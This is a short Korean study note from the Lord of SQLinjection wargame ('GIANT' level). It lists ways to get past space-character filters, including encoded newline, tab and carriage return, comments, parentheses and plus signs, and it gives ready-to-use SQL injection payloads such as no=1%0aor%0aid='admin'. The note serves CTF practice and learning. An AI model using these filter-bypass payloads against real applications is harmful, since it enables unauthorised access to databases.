(los[Lord of SQLinjection]) GIANT

공백우회문자 -> /**/, %2-, %2b, +, %09, %0a, %0b, %0c, %0d, %a0

1) Line Feed (\n)

- 커서(캐럿)를 다음 줄(현재 위치에서 바로 아래줄)로 이동시키는 개행 문자

- URL Encoding: %0a

- ex) no=1%0aor%0aid='admin'

 

2) Tab (\t)

- 커서를 한 tab만큼 이동시키는 문자

- URL Encoding: %09

- ex) no=1%09or%09id='admin'

 

3) Carrage Return (\r)

- 커서(캐럿)를 줄의 맨 앞(왼쪽)으로 이동시키는 개행 문자

- URL Encoding: %0d

- ex) no=1%0dor%0did='admin'

 

4) 주석 (/**/)

- ex) no=1/**/or/**/id='admin'

 

5) 괄호 ()

- ex) no=(1)or(id='admin')

 

6) 더하기 (+)

- ex) no=1+or+id='admin'

 

7) %0b, %0c, %a0

- 1~6까지의 모든 우회 방법이 먹히지 않을 경우 공백 대신 사용

- %a0은 잘 안먹히는 것 같으니 %0b나 %0c를 위주로 사용하자.